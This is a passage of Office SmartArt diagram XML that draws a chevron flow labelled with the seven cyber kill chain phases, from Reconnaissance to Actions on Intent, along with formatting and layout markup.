          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85BE8E1F-C0F2-42DD-A617-C789BA6D2C2A}" type="parTrans" cxnId="{4CE96D5F-CA9D-487B-9B92-BB6315B48AE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D14950A8-E84E-42C6-8041-C9F78A24138F}" type="sibTrans" cxnId="{4CE96D5F-CA9D-487B-9B92-BB6315B48AE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="1663557" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Weaponization</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C44F43F7-8648-4846-8D8F-A8BBC38371C7}" type="parTrans" cxnId="{960F4F01-5307-4D22-9904-529D536F3B93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF6E9039-CA22-4957-B5A8-E7326CEE808A}" type="sibTrans" cxnId="{960F4F01-5307-4D22-9904-529D536F3B93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C0FF53C-9599-4663-AA15-6F48C87592AD}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="3327115" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Delivery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C56BBFC8-FE01-4B07-A630-C11D4837432A}" type="parTrans" cxnId="{9617FEBA-F5DE-4984-A2BE-E91FAF371391}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF9E8DE5-4F70-4A0F-89ED-1A0A892004B8}" type="sibTrans" cxnId="{9617FEBA-F5DE-4984-A2BE-E91FAF371391}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="4990672" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA81A173-EAD5-4BE8-A42E-48C593469CA8}" type="parTrans" cxnId="{613BE18B-76C7-4303-9AFF-AE47EDAF6B3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{305F4BAD-FB41-457B-953B-AB6F8B94F5FD}" type="sibTrans" cxnId="{613BE18B-76C7-4303-9AFF-AE47EDAF6B3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC3253FA-E764-4D81-BF29-38E03620DDE9}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="6654230" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Installation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{644DABE2-7650-451F-91B5-0F34EE0FE9BF}" type="parTrans" cxnId="{4068BB73-74DA-499A-9E01-83EF1B141CE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFD8BFC0-4F10-4AA6-B730-78592865A913}" type="sibTrans" cxnId="{4068BB73-74DA-499A-9E01-83EF1B141CE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68D0036A-8557-461D-A4B7-73991B06DF41}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="8317788" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>C2</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4215670A-3B80-4C16-B2BD-C7175FF9CDF2}" type="parTrans" cxnId="{5018869D-70BE-4388-A81D-C7E7DF271A63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E91F9D52-DD55-4CB3-AC43-BF6FB772F435}" type="sibTrans" cxnId="{5018869D-70BE-4388-A81D-C7E7DF271A63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="9981345" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Actions on Intent</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{663F063F-B55D-4ED4-AE35-7435D7030294}" type="parTrans" cxnId="{D3727416-D79D-4406-81F7-49C7A77F4312}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A52BCBD3-8960-4E92-9361-7BAF6F0C8CA3}" type="sibTrans" cxnId="{D3727416-D79D-4406-81F7-49C7A77F4312}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" type="pres">
      <dgm:prSet presAssocID="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0ECC459B-8B96-499D-9275-7BAB340E5118}" type="pres">
      <dgm:prSet presAssocID="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7746FB5-FE13-462F-8E63-F9E122252733}" type="pres">
      <dgm:prSet presAssocID="{D14950A8-E84E-42C6-8041-C9F78A24138F}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}" type="pres">
      <dgm:prSet presAssocID="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEDC4440-0A03-4E10-9A0B-019D21486401}" type="pres">
      <dgm:prSet presAssocID="{EF6E9039-CA22-4957-B5A8-E7326CEE808A}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}" type="pres">
      <dgm:prSet presAssocID="{2C0FF53C-9599-4663-AA15-6F48C87592AD}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8219E40A-B9A2-47B1-96BC-7661A64222D6}" type="pres">
      <dgm:prSet presAssocID="{FF9E8DE5-4F70-4A0F-89ED-1A0A892004B8}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4776655-5682-4618-995A-AE28AE427452}" type="pres">
      <dgm:prSet presAssocID="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16E1A370-238B-4306-9551-49A74BD28131}" type="pres">
      <dgm:prSet presAssocID="{305F4BAD-FB41-457B-953B-AB6F8B94F5FD}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}" type="pres">
      <dgm:prSet presAssocID="{AC3253FA-E764-4D81-BF29-38E03620DDE9}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEE31668-27EC-4C8C-A9B1-6D84C48EB770}" type="pres">
      <dgm:prSet presAssocID="{DFD8BFC0-4F10-4AA6-B730-78592865A913}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}" type="pres">
      <dgm:prSet presAssocID="{68D0036A-8557-461D-A4B7-73991B06DF41}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{184798DB-8C6E-4A48-AE03-924FABD3E07B}" type="pres">
      <dgm:prSet presAssocID="{E91F9D52-DD55-4CB3-AC43-BF6FB772F435}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}" type="pres">
      <dgm:prSet presAssocID="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{960F4F01-5307-4D22-9904-529D536F3B93}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}" srcOrd="1" destOrd="0" parTransId="{C44F43F7-8648-4846-8D8F-A8BBC38371C7}" sibTransId="{EF6E9039-CA22-4957-B5A8-E7326CEE808A}"/>
    <dgm:cxn modelId="{0FEA1905-3956-4B39-B6CB-361ACC1EC944}" type="presOf" srcId="{2C0FF53C-9599-4663-AA15-6F48C87592AD}" destId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{D3727416-D79D-4406-81F7-49C7A77F4312}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}" srcOrd="6" destOrd="0" parTransId="{663F063F-B55D-4ED4-AE35-7435D7030294}" sibTransId="{A52BCBD3-8960-4E92-9361-7BAF6F0C8CA3}"/>
    <dgm:cxn modelId="{C42F2E38-ADCA-4F5E-9218-D1C1C71B2F5E}" type="presOf" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4CE96D5F-CA9D-487B-9B92-BB6315B48AE7}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}" srcOrd="0" destOrd="0" parTransId="{85BE8E1F-C0F2-42DD-A617-C789BA6D2C2A}" sibTransId="{D14950A8-E84E-42C6-8041-C9F78A24138F}"/>
    <dgm:cxn modelId="{68FB6A46-DD11-480D-AE05-B1AF739F46FC}" type="presOf" srcId="{68D0036A-8557-461D-A4B7-73991B06DF41}" destId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{C9FE8549-718A-4A32-B521-189ED746EECE}" type="presOf" srcId="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}" destId="{0ECC459B-8B96-499D-9275-7BAB340E5118}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{E6298350-4808-4431-83D1-DFC66BE781AE}" type="presOf" srcId="{AC3253FA-E764-4D81-BF29-38E03620DDE9}" destId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4068BB73-74DA-499A-9E01-83EF1B141CE6}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{AC3253FA-E764-4D81-BF29-38E03620DDE9}" srcOrd="4" destOrd="0" parTransId="{644DABE2-7650-451F-91B5-0F34EE0FE9BF}" sibTransId="{DFD8BFC0-4F10-4AA6-B730-78592865A913}"/>
    <dgm:cxn modelId="{613BE18B-76C7-4303-9AFF-AE47EDAF6B3E}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}" srcOrd="3" destOrd="0" parTransId="{BA81A173-EAD5-4BE8-A42E-48C593469CA8}" sibTransId="{305F4BAD-FB41-457B-953B-AB6F8B94F5FD}"/>
    <dgm:cxn modelId="{5018869D-70BE-4388-A81D-C7E7DF271A63}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{68D0036A-8557-461D-A4B7-73991B06DF41}" srcOrd="5" destOrd="0" parTransId="{4215670A-3B80-4C16-B2BD-C7175FF9CDF2}" sibTransId="{E91F9D52-DD55-4CB3-AC43-BF6FB772F435}"/>
    <dgm:cxn modelId="{EA97BDA4-4C7F-440F-B6D3-32ACD99EA954}" type="presOf" srcId="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}" destId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{9617FEBA-F5DE-4984-A2BE-E91FAF371391}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{2C0FF53C-9599-4663-AA15-6F48C87592AD}" srcOrd="2" destOrd="0" parTransId="{C56BBFC8-FE01-4B07-A630-C11D4837432A}" sibTransId="{FF9E8DE5-4F70-4A0F-89ED-1A0A892004B8}"/>
    <dgm:cxn modelId="{077EE0BB-0353-443C-AD0A-02C740B5E389}" type="presOf" srcId="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}" destId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{452107F8-84F3-4D6A-BB68-36C29BA3BD18}" type="presOf" srcId="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}" destId="{B4776655-5682-4618-995A-AE28AE427452}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{38B46E24-5EF6-4830-BD2E-5897918E1C1E}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{0ECC459B-8B96-499D-9275-7BAB340E5118}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4620BA2C-910E-4825-B16A-0A76FBB12F52}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{C7746FB5-FE13-462F-8E63-F9E122252733}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{61FCAB0C-AAC1-4E4C-9B98-44E902DF5379}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{021D61FF-A543-4135-A1C0-19557D5A3A57}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{FEDC4440-0A03-4E10-9A0B-019D21486401}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{8314A56E-4955-4DE3-B84E-93F54151AB64}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{74D45618-AA2A-4674-819B-3DE250EEC1EE}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{8219E40A-B9A2-47B1-96BC-7661A64222D6}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4AEDFCCA-D82F-4047-8BEF-A968451EA3B1}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{B4776655-5682-4618-995A-AE28AE427452}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{F532F74F-E7EF-4091-AF11-AD2E039B9CEC}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{16E1A370-238B-4306-9551-49A74BD28131}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{DB1D96FA-F7FB-4F94-80D0-CEB68A81B104}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{AAA4C21D-AC65-4B7B-BDAE-B7B5E4FDAE7B}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{FEE31668-27EC-4C8C-A9B1-6D84C48EB770}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{00A41C3E-18D7-4B39-AEB5-CE91293ED549}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{A7C4B8FB-5A9F-47E7-BF3E-420D68EF1F34}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{184798DB-8C6E-4A48-AE03-924FABD3E07B}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{863A4C93-3C3F-44A3-8E0B-137B8AD8D543}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}"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EAE59-E5CD-4AB5-835A-4DA0E04DD3BE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
